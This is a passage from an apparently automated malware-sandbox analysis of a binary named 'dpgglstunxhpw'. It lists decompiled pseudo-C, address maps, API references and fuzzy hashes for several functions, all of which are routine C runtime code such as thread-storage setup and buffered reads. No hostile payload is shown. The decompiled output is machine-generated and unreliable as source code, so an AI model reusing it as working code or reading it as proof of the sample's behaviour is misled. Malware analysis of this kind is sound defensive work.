                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID: 8+&
                                      • API String ID: 2579439406-3528023082
                                      • Opcode ID: 5a4a30d4b183a6f5689afef321dfb0e74dc2e1b2a13235df191463a946331b0a
                                      • Instruction ID: dbcf6b17a614ed6de0b1c9335e572033b93b759128c27e0357c0478f51a6bb28
                                      • Opcode Fuzzy Hash: 5a4a30d4b183a6f5689afef321dfb0e74dc2e1b2a13235df191463a946331b0a
                                      • Instruction Fuzzy Hash: 2221C0B9E08205DFD704EFA5EB48A443BB4BB48310F41817AE509B76A1E7B46989CF4D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 62%
                                      			E00404439(void* __ebx) {
                                      				void* __edi;
                                      				void* __esi;
                                      				_Unknown_base(*)()* _t7;
                                      				long _t10;
                                      				void* _t11;
                                      				int _t12;
                                      				void* _t14;
                                      				void* _t15;
                                      				void* _t16;
                                      				void* _t18;
                                      				intOrPtr _t21;
                                      				long _t26;
                                      				void* _t30;
                                      				struct HINSTANCE__* _t35;
                                      				intOrPtr* _t36;
                                      				void* _t39;
                                      				intOrPtr* _t41;
                                      				void* _t42;
                                      
                                      				_t30 = __ebx;
                                      				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                                      				if(_t35 != 0) {
                                      					 *0x40d844 = GetProcAddress(_t35, "FlsAlloc");
                                      					 *0x40d848 = GetProcAddress(_t35, "FlsGetValue");
                                      					 *0x40d84c = GetProcAddress(_t35, "FlsSetValue");
                                      					_t7 = GetProcAddress(_t35, "FlsFree");
                                      					__eflags =  *0x40d844;
                                      					_t39 = TlsSetValue;
                                      					 *0x40d850 = _t7;
                                      					if( *0x40d844 == 0) {
                                      						L6:
                                      						 *0x40d848 = TlsGetValue;
                                      						 *0x40d844 = E00404149;
                                      						 *0x40d84c = _t39;
                                      						 *0x40d850 = TlsFree;
                                      					} else {
                                      						__eflags =  *0x40d848;
                                      						if( *0x40d848 == 0) {
                                      							goto L6;
                                      						} else {
                                      							__eflags =  *0x40d84c;
                                      							if( *0x40d84c == 0) {
                                      								goto L6;
                                      							} else {
                                      								__eflags = _t7;
                                      								if(_t7 == 0) {
                                      									goto L6;
                                      								}
                                      							}
                                      						}
                                      					}
                                      					_t10 = TlsAlloc();
                                      					 *0x40c574 = _t10;
                                      					__eflags = _t10 - 0xffffffff;
                                      					if(_t10 == 0xffffffff) {
                                      						L15:
                                      						_t11 = 0;
                                      						__eflags = 0;
                                      					} else {
                                      						_t12 = TlsSetValue(_t10,  *0x40d848);
                                      						__eflags = _t12;
                                      						if(_t12 == 0) {
                                      							goto L15;
                                      						} else {
                                      							E00401FC4();
                                      							_t41 = __imp__EncodePointer;
                                      							_t14 =  *_t41( *0x40d844);
                                      							 *0x40d844 = _t14;
                                      							_t15 =  *_t41( *0x40d848);
                                      							 *0x40d848 = _t15;
                                      							_t16 =  *_t41( *0x40d84c);
                                      							 *0x40d84c = _t16;
                                      							 *0x40d850 =  *_t41( *0x40d850);
                                      							_t18 = E00406124();
                                      							__eflags = _t18;
                                      							if(_t18 == 0) {
                                      								L14:
                                      								E00404186();
                                      								goto L15;
                                      							} else {
                                      								_t36 = __imp__DecodePointer;
                                      								_t21 =  *((intOrPtr*)( *_t36()))( *0x40d844, E0040430A);
                                      								 *0x40c570 = _t21;
                                      								__eflags = _t21 - 0xffffffff;
                                      								if(_t21 == 0xffffffff) {
                                      									goto L14;
                                      								} else {
                                      									_t42 = E004059E0(1, 0x214);
                                      									__eflags = _t42;
                                      									if(_t42 == 0) {
                                      										goto L14;
                                      									} else {
                                      										__eflags =  *((intOrPtr*)( *_t36()))( *0x40d84c,  *0x40c570, _t42);
                                      										if(__eflags == 0) {
                                      											goto L14;
                                      										} else {
                                      											_push(0);
                                      											_push(_t42);
                                      											E004041C3(_t30, _t36, _t42, __eflags);
                                      											_t26 = GetCurrentThreadId();
                                      											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                                      											 *_t42 = _t26;
                                      											_t11 = 1;
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      					return _t11;
                                      				} else {
                                      					E00404186();
                                      					return 0;
                                      				}
                                      			}





















                                      0x00404439
                                      0x00404447
                                      0x0040444b
                                      0x0040446b
                                      0x00404478
                                      0x00404485
                                      0x0040448a
                                      0x0040448c
                                      0x00404493
                                      0x00404499
                                      0x0040449e
                                      0x004044b6
                                      0x004044bb
                                      0x004044c5
                                      0x004044cf
                                      0x004044d5
                                      0x004044a0
                                      0x004044a0
                                      0x004044a7
                                      0x00000000
                                      0x004044a9
                                      0x004044a9
                                      0x004044b0
                                      0x00000000
                                      0x004044b2
                                      0x004044b2
                                      0x004044b4
                                      0x00000000
                                      0x00000000
                                      0x004044b4
                                      0x004044b0
                                      0x004044a7
                                      0x004044da
                                      0x004044e0
                                      0x004044e5
                                      0x004044e8
                                      0x004045af
                                      0x004045af
                                      0x004045af
                                      0x004044ee
                                      0x004044f5
                                      0x004044f7
                                      0x004044f9
                                      0x00000000
                                      0x004044ff
                                      0x004044ff
                                      0x0040450a
                                      0x00404510
                                      0x00404518
                                      0x0040451d
                                      0x00404525
                                      0x0040452a
                                      0x00404532
                                      0x00404539
                                      0x0040453e
                                      0x00404543
                                      0x00404545
                                      0x004045aa
                                      0x004045aa
                                      0x00000000
                                      0x00404547
                                      0x00404547
                                      0x0040455a
                                      0x0040455c
                                      0x00404561
                                      0x00404564
                                      0x00000000
                                      0x00404566
                                      0x00404572
                                      0x00404576
                                      0x00404578
                                      0x00000000
                                      0x0040457a
                                      0x0040458b
                                      0x0040458d
                                      0x00000000
                                      0x0040458f
                                      0x0040458f
                                      0x00404591
                                      0x00404592
                                      0x00404599
                                      0x0040459f
                                      0x004045a3
                                      0x004045a7
                                      0x004045a7
                                      0x0040458d
                                      0x00404578
                                      0x00404564
                                      0x00404545
                                      0x004044f9
                                      0x004045b3
                                      0x0040444d
                                      0x0040444d
                                      0x00404455
                                      0x00404455

                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401B9D), ref: 00404441
                                      • __mtterm.LIBCMT ref: 0040444D
                                        • Part of subcall function 00404186: DecodePointer.KERNEL32(00000004,004045AF,?,00401B9D), ref: 00404197
                                        • Part of subcall function 00404186: TlsFree.KERNEL32(00000019,004045AF,?,00401B9D), ref: 004041B1
                                        • Part of subcall function 00404186: DeleteCriticalSection.KERNEL32(00000000,00000000,77A5B15F,?,004045AF,?,00401B9D), ref: 0040618B
                                        • Part of subcall function 00404186: _free.LIBCMT ref: 0040618E
                                        • Part of subcall function 00404186: DeleteCriticalSection.KERNEL32(00000019,77A5B15F,?,004045AF,?,00401B9D), ref: 004061B5
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,00401B9D), ref: 00404463
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,00401B9D), ref: 00404470
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,00401B9D), ref: 0040447D
                                      • GetProcAddress.KERNEL32(00000000,FlsFree,?,00401B9D), ref: 0040448A
                                      • TlsAlloc.KERNEL32(?,00401B9D), ref: 004044DA
                                      • TlsSetValue.KERNEL32(00000000,?,00401B9D), ref: 004044F5
                                      • __init_pointers.LIBCMT ref: 004044FF
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 00404510
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 0040451D
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 0040452A
                                      • EncodePointer.KERNEL32(?,00401B9D), ref: 00404537
                                      • DecodePointer.KERNEL32(0040430A,?,00401B9D), ref: 00404558
                                      • __calloc_crt.LIBCMT ref: 0040456D
                                      • DecodePointer.KERNEL32(00000000,?,00401B9D), ref: 00404587
                                      • GetCurrentThreadId.KERNEL32(?,00401B9D), ref: 00404599
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: fcb6ee4b144fc0039d8e472aa05ea99e8894d2fc9dd1030c82cdb18b4f8161c3
                                      • Instruction ID: c3e9338d85a01cfe0ed26c54675152b6764567e349a99c4c3ac65f6cdb1ce54c
                                      • Opcode Fuzzy Hash: fcb6ee4b144fc0039d8e472aa05ea99e8894d2fc9dd1030c82cdb18b4f8161c3
                                      • Instruction Fuzzy Hash: F2313FB2D01211AAC720BFB5EE096163BE5EBC4360B14863BE524B22F1D7789845CF9D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E004041C3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t26;
                                      				intOrPtr _t30;
                                      				intOrPtr _t39;
                                      				void* _t40;
                                      
                                      				_t31 = __ebx;
                                      				_push(8);
                                      				_push(0x40adc0);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				GetModuleHandleW(L"KERNEL32.DLL");
                                      				_t39 =  *((intOrPtr*)(_t40 + 8));
                                      				 *((intOrPtr*)(_t39 + 0x5c)) = 0x409dd0;
                                      				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
                                      				 *((intOrPtr*)(_t39 + 0x14)) = 1;
                                      				 *((intOrPtr*)(_t39 + 0x70)) = 1;
                                      				 *((char*)(_t39 + 0xc8)) = 0x43;
                                      				 *((char*)(_t39 + 0x14b)) = 0x43;
                                      				 *(_t39 + 0x68) = 0x40c578;
                                      				E0040629E(__ebx, 1, 0xd);
                                      				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
                                      				InterlockedIncrement( *(_t39 + 0x68));
                                      				 *(_t40 - 4) = 0xfffffffe;
                                      				E00404265();
                                      				E0040629E(_t31, 1, 0xc);
                                      				 *(_t40 - 4) = 1;
                                      				_t26 =  *((intOrPtr*)(_t40 + 0xc));
                                      				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
                                      				if(_t26 == 0) {
                                      					_t30 =  *0x40cce0; // 0x40cc08
                                      					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
                                      				}
                                      				E0040563F( *((intOrPtr*)(_t39 + 0x6c)));
                                      				 *(_t40 - 4) = 0xfffffffe;
                                      				return E00402F05(E0040426E());
                                      			}







                                      0x004041c3
                                      0x004041c3
                                      0x004041c5
                                      0x004041ca
                                      0x004041d4
                                      0x004041da
                                      0x004041dd
                                      0x004041e4
                                      0x004041eb
                                      0x004041ee
                                      0x004041f1
                                      0x004041f8
                                      0x004041ff
                                      0x00404208
                                      0x0040420e
                                      0x00404215
                                      0x0040421b
                                      0x00404222
                                      0x00404229
                                      0x0040422f
                                      0x00404232
                                      0x00404235
                                      0x0040423a
                                      0x0040423c
                                      0x00404241
                                      0x00404241
                                      0x00404247
                                      0x0040424d
                                      0x0040425e

                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040ADC0,00000008,004042CB,00000000,00000000,?,00401038,?,00409378), ref: 004041D4
                                      • __lock.LIBCMT ref: 00404208
                                        • Part of subcall function 0040629E: __mtinitlocknum.LIBCMT ref: 004062B4
                                        • Part of subcall function 0040629E: __amsg_exit.LIBCMT ref: 004062C0
                                        • Part of subcall function 0040629E: EnterCriticalSection.KERNEL32(?,?,?,0040420D,0000000D), ref: 004062C8
                                      • InterlockedIncrement.KERNEL32(0040C578), ref: 00404215
                                      • __lock.LIBCMT ref: 00404229
                                      • ___addlocaleref.LIBCMT ref: 00404247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 9368804bd3479670163917d4ae4201fb94beba0c7f6118466ca6f312f96598b5
                                      • Instruction ID: d428de3b8589a0431686e7cb1a02ea656415c747b6556e04c479c792043df686
                                      • Opcode Fuzzy Hash: 9368804bd3479670163917d4ae4201fb94beba0c7f6118466ca6f312f96598b5
                                      • Instruction Fuzzy Hash: FC018E71440B00EED720AF66D909709FBE0AF80324F10896FE496732E1CBB8AA40CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 81%
                                      			E0040517E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t15;
                                      				LONG* _t21;
                                      				void* _t31;
                                      				LONG* _t33;
                                      				void* _t34;
                                      				void* _t35;
                                      
                                      				_t35 = __eflags;
                                      				_t29 = __edx;
                                      				_t25 = __ebx;
                                      				_push(0xc);
                                      				_push(0x40ae30);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				_t31 = E004042F0(__ebx, __edx, _t35);
                                      				_t15 =  *0x40ca98; // 0xfffffffe
                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                      					E0040629E(_t25, _t31, 0xd);
                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                      					_t33 =  *(_t31 + 0x68);
                                      					 *(_t34 - 0x1c) = _t33;
                                      					__eflags = _t33 -  *0x40c9a0; // 0x1f21a00
                                      					if(__eflags != 0) {
                                      						__eflags = _t33;
                                      						if(__eflags != 0) {
                                      							__eflags = InterlockedDecrement(_t33);
                                      							if(__eflags == 0) {
                                      								__eflags = _t33 - 0x40c578;
                                      								if(__eflags != 0) {
                                      									E004012B0(_t33);
                                      								}
                                      							}
                                      						}
                                      						_t21 =  *0x40c9a0; // 0x1f21a00
                                      						 *(_t31 + 0x68) = _t21;
                                      						_t33 =  *0x40c9a0; // 0x1f21a00
                                      						 *(_t34 - 0x1c) = _t33;
                                      						InterlockedIncrement(_t33);
                                      					}
                                      					 *(_t34 - 4) = 0xfffffffe;
                                      					E00405219();
                                      				} else {
                                      					_t33 =  *(_t31 + 0x68);
                                      				}
                                      				_t38 = _t33;
                                      				if(_t33 == 0) {
                                      					_push(0x20);
                                      					E0040223C(_t29, _t38);
                                      				}
                                      				return E00402F05(_t33);
                                      			}









                                      0x0040517e
                                      0x0040517e
                                      0x0040517e
                                      0x0040517e
                                      0x00405180
                                      0x00405185
                                      0x0040518f
                                      0x00405191
                                      0x00405199
                                      0x004051ba
                                      0x004051c0
                                      0x004051c4
                                      0x004051c7
                                      0x004051ca
                                      0x004051d0
                                      0x004051d2
                                      0x004051d4
                                      0x004051dd
                                      0x004051df
                                      0x004051e1
                                      0x004051e7
                                      0x004051ea
                                      0x004051ef
                                      0x004051e7
                                      0x004051df
                                      0x004051f0
                                      0x004051f5
                                      0x004051f8
                                      0x004051fe
                                      0x00405202
                                      0x00405202
                                      0x00405208
                                      0x0040520f
                                      0x004051a1
                                      0x004051a1
                                      0x004051a1
                                      0x004051a4
                                      0x004051a6
                                      0x004051a8
                                      0x004051aa
                                      0x004051af
                                      0x004051b7

                                      APIs
                                      • __getptd.LIBCMT ref: 0040518A
                                        • Part of subcall function 004042F0: __getptd_noexit.LIBCMT ref: 004042F3
                                        • Part of subcall function 004042F0: __amsg_exit.LIBCMT ref: 00404300
                                      • __amsg_exit.LIBCMT ref: 004051AA
                                      • __lock.LIBCMT ref: 004051BA
                                      • InterlockedDecrement.KERNEL32(?), ref: 004051D7
                                      • _free.LIBCMT ref: 004051EA
                                      • InterlockedIncrement.KERNEL32(01F21A00), ref: 00405202
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 9e3d08d9d8b8cbccd9aa46752a9a02badfb21c37146b35ec9e066227df42940b
                                      • Instruction ID: 61f947c996ca1a67885c84a75fe1426d65295c5a16dda6521d063a9dc6fb5bb1
                                      • Opcode Fuzzy Hash: 9e3d08d9d8b8cbccd9aa46752a9a02badfb21c37146b35ec9e066227df42940b
                                      • Instruction Fuzzy Hash: F4017931D41A22EBDA21AB65994974B7360AF04754F45027FE800BB2D2CB7C6841DFDE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E0040142B(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                      				signed int _v8;
                                      				char* _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed int _t82;
                                      				char _t89;
                                      				signed int _t96;
                                      				signed int _t98;
                                      				signed int _t101;
                                      				signed int _t104;
                                      				signed int _t108;
                                      				signed int _t109;
                                      				char* _t110;
                                      				signed int _t120;
                                      				signed int _t123;
                                      				signed int _t124;
                                      				signed int _t125;
                                      				signed int _t126;
                                      				void* _t127;
                                      
                                      				_t110 = _a4;
                                      				_t108 = _a8;
                                      				_t123 = _a12;
                                      				_v12 = _t110;
                                      				_v8 = _t108;
                                      				if(_t123 == 0 || _a16 == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					_t131 = _t110;
                                      					if(_t110 != 0) {
                                      						_t126 = _a20;
                                      						__eflags = _t126;
                                      						if(_t126 == 0) {
                                      							L9:
                                      							__eflags = _t108 - 0xffffffff;
                                      							if(_t108 != 0xffffffff) {
                                      								_t82 = E00401A70(_t110, 0, _t108);
                                      								_t127 = _t127 + 0xc;
                                      							}
                                      							__eflags = _t126;
                                      							if(__eflags == 0) {
                                      								goto L3;
                                      							} else {
                                      								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                      								if(__eflags > 0) {
                                      									goto L3;
                                      								}
                                      								L13:
                                      								_t124 = _t123 * _a16;
                                      								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                      								_v20 = _t124;
                                      								_t109 = _t124;
                                      								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                      									_v16 = 0x1000;
                                      								} else {
                                      									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                      								}
                                      								__eflags = _t124;
                                      								if(_t124 == 0) {
                                      									L40:
                                      									return _a16;
                                      								} else {
                                      									do {
                                      										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                      										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                      											L24:
                                      											__eflags = _t109 - _v16;
                                      											if(_t109 < _v16) {
                                      												_t89 = E0040249F(_t109, _t124, _t126);
                                      												__eflags = _t89 - 0xffffffff;
                                      												if(_t89 == 0xffffffff) {
                                      													L45:
                                      													return (_t124 - _t109) / _a12;
                                      												}
                                      												__eflags = _v8;
                                      												if(_v8 == 0) {
                                      													L41:
                                      													__eflags = _a8 - 0xffffffff;
                                      													if(__eflags != 0) {
                                      														E00401A70(_a4, 0, _a8);
                                      													}
                                      													 *((intOrPtr*)(E00401E66(__eflags))) = 0x22;
                                      													L4:
                                      													E00401E14();
                                      													goto L5;
                                      												}
                                      												_v12 = _v12 + 1;
                                      												 *_v12 = _t89;
                                      												_t109 = _t109 - 1;
                                      												_t65 =  &_v8;
                                      												 *_t65 = _v8 - 1;
                                      												__eflags =  *_t65;
                                      												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                      												goto L39;
                                      											}
                                      											__eflags = _v16;
                                      											if(_v16 == 0) {
                                      												_t96 = 0x7fffffff;
                                      												__eflags = _t109 - 0x7fffffff;
                                      												if(_t109 <= 0x7fffffff) {
                                      													_t96 = _t109;
                                      												}
                                      											} else {
                                      												__eflags = _t109 - 0x7fffffff;
                                      												if(_t109 <= 0x7fffffff) {
                                      													_t50 = _t109 % _v16;
                                      													__eflags = _t50;
                                      													_t120 = _t50;
                                      													_t101 = _t109;
                                      												} else {
                                      													_t120 = 0x7fffffff % _v16;
                                      													_t101 = 0x7fffffff;
                                      												}
                                      												_t96 = _t101 - _t120;
                                      											}
                                      											__eflags = _t96 - _v8;
                                      											if(_t96 > _v8) {
                                      												goto L41;
                                      											} else {
                                      												_push(_t96);
                                      												_push(_v12);
                                      												_push(E00402C6E(_t126));
                                      												_t98 = E00402B78(_t109, _t124, _t126, __eflags);
                                      												_t127 = _t127 + 0xc;
                                      												__eflags = _t98;
                                      												if(_t98 == 0) {
                                      													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                      													goto L45;
                                      												}
                                      												__eflags = _t98 - 0xffffffff;
                                      												if(_t98 == 0xffffffff) {
                                      													L44:
                                      													_t72 = _t126 + 0xc;
                                      													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                      													__eflags =  *_t72;
                                      													goto L45;
                                      												}
                                      												_v12 = _v12 + _t98;
                                      												_t109 = _t109 - _t98;
                                      												_v8 = _v8 - _t98;
                                      												goto L39;
                                      											}
                                      										}
                                      										_t104 =  *(_t126 + 4);
                                      										__eflags = _t104;
                                      										if(__eflags == 0) {
                                      											goto L24;
                                      										}
                                      										if(__eflags < 0) {
                                      											goto L44;
                                      										}
                                      										_t125 = _t109;
                                      										__eflags = _t109 - _t104;
                                      										if(_t109 >= _t104) {
                                      											_t125 = _t104;
                                      										}
                                      										__eflags = _t125 - _v8;
                                      										if(_t125 > _v8) {
                                      											goto L41;
                                      										} else {
                                      											E00402C94(_v12, _v8,  *_t126, _t125);
                                      											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                      											 *_t126 =  *_t126 + _t125;
                                      											_v12 = _v12 + _t125;
                                      											_t109 = _t109 - _t125;
                                      											_t127 = _t127 + 0x10;
                                      											_v8 = _v8 - _t125;
                                      											_t124 = _v20;
                                      										}
                                      										L39:
                                      										__eflags = _t109;
                                      									} while (_t109 != 0);
                                      									goto L40;
                                      								}
                                      							}
                                      						}
                                      						_t82 = (_t82 | 0xffffffff) / _t123;
                                      						__eflags = _a16 - _t82;
                                      						if(_a16 <= _t82) {
                                      							goto L13;
                                      						}
                                      						goto L9;
                                      					}
                                      					L3:
                                      					 *((intOrPtr*)(E00401E66(_t131))) = 0x16;
                                      					goto L4;
                                      				}
                                      			}


























                                      0x00401433
                                      0x00401437
                                      0x0040143c
                                      0x0040143f
                                      0x00401442
                                      0x00401447
                                      0x00401463
                                      0x00000000
                                      0x0040144f
                                      0x0040144f
                                      0x00401451
                                      0x0040146a
                                      0x0040146d
                                      0x0040146f
                                      0x0040147d
                                      0x0040147d
                                      0x00401480
                                      0x00401486
                                      0x0040148b
                                      0x0040148b
                                      0x0040148e
                                      0x00401490
                                      0x00000000
                                      0x00401492
                                      0x00401499
                                      0x0040149c
                                      0x00000000
                                      0x00000000
                                      0x0040149e
                                      0x0040149e
                                      0x004014a2
                                      0x004014a9
                                      0x004014ac
                                      0x004014ae
                                      0x004014b8
                                      0x004014b0
                                      0x004014b3
                                      0x004014b3
                                      0x004014bf
                                      0x004014c1
                                      0x004015a1
                                      0x00000000
                                      0x004014c7
                                      0x004014c7
                                      0x004014c7
                                      0x004014ce
                                      0x00401514
                                      0x00401514
                                      0x00401517
                                      0x00401576
                                      0x0040157c
                                      0x0040157f
                                      0x004015d3
                                      0x00000000
                                      0x004015d9
                                      0x00401581
                                      0x00401585
                                      0x004015a9
                                      0x004015a9
                                      0x004015ad
                                      0x004015b7
                                      0x004015bc
                                      0x004015c4
                                      0x0040145e
                                      0x0040145e
                                      0x00000000
                                      0x0040145e
                                      0x0040158a
                                      0x0040158d
                                      0x00401592
                                      0x00401593
                                      0x00401593
                                      0x00401593
                                      0x00401596
                                      0x00000000
                                      0x00401596
                                      0x00401519
                                      0x0040151d
                                      0x0040153e
                                      0x00401543
                                      0x00401545
                                      0x00401547
                                      0x00401547
                                      0x0040151f
                                      0x00401526
                                      0x00401528
                                      0x00401535
                                      0x00401535
                                      0x00401535
                                      0x00401538
                                      0x0040152a
                                      0x0040152c
                                      0x0040152f
                                      0x0040152f
                                      0x0040153a
                                      0x0040153a
                                      0x00401549
                                      0x0040154c
                                      0x00000000
                                      0x0040154e
                                      0x0040154e
                                      0x0040154f
                                      0x00401559
                                      0x0040155a
                                      0x0040155f
                                      0x00401562
                                      0x00401564
                                      0x004015e1
                                      0x00000000
                                      0x004015e1
                                      0x00401566
                                      0x00401569
                                      0x004015cf
                                      0x004015cf
                                      0x004015cf
                                      0x004015cf
                                      0x00000000
                                      0x004015cf
                                      0x0040156b
                                      0x0040156e
                                      0x00401570
                                      0x00000000
                                      0x00401570
                                      0x0040154c
                                      0x004014d0
                                      0x004014d3
                                      0x004014d5
                                      0x00000000
                                      0x00000000
                                      0x004014d7
                                      0x00000000
                                      0x00000000
                                      0x004014dd
                                      0x004014df
                                      0x004014e1
                                      0x004014e3
                                      0x004014e3
                                      0x004014e5
                                      0x004014e8
                                      0x00000000
                                      0x004014ee
                                      0x004014f7
                                      0x004014fc
                                      0x004014ff
                                      0x00401501
                                      0x00401504
                                      0x00401506
                                      0x00401509
                                      0x0040150c
                                      0x0040150c
                                      0x00401599
                                      0x00401599
                                      0x00401599
                                      0x00000000
                                      0x004014c7
                                      0x004014c1
                                      0x00401490
                                      0x00401476
                                      0x00401478
                                      0x0040147b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040147b
                                      0x00401453
                                      0x00401458
                                      0x00000000
                                      0x00401458

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 4048096073-0
                                      • Opcode ID: 0cd08acd97a4d25d2423ee29e9a75b44744814a9ce64f5da55171a435f6764df
                                      • Instruction ID: 7a080fabcb58439197a1708b88f97224dc043be32e8d8de740e80110cf7f810b
                                      • Opcode Fuzzy Hash: 0cd08acd97a4d25d2423ee29e9a75b44744814a9ce64f5da55171a435f6764df
                                      • Instruction Fuzzy Hash: DC51A871A00204EBDB249F79CD4469EB7B5AF80314F24823BE8267B2F0D7789E51DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E0040137E(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                      				void* _t7;
                                      				long _t8;
                                      				intOrPtr* _t9;
                                      				intOrPtr* _t12;
                                      				long _t27;
                                      				long _t30;
                                      
                                      				if(_a4 != 0) {
                                      					_push(__esi);
                                      					_t30 = _a8;
                                      					__eflags = _t30;
                                      					if(_t30 != 0) {
                                      						_push(__edi);
                                      						while(1) {
                                      							__eflags = _t30 - 0xffffffe0;
                                      							if(_t30 > 0xffffffe0) {
                                      								break;
                                      							}
                                      							__eflags = _t30;
                                      							if(_t30 == 0) {
                                      								_t30 = _t30 + 1;
                                      								__eflags = _t30;
                                      							}
                                      							_t7 = HeapReAlloc( *0x40cfc4, 0, _a4, _t30);
                                      							_t27 = _t7;
                                      							__eflags = _t27;
                                      							if(_t27 != 0) {
                                      								L17:
                                      								_t8 = _t27;
                                      							} else {
                                      								__eflags =  *0x40d62c - _t7;
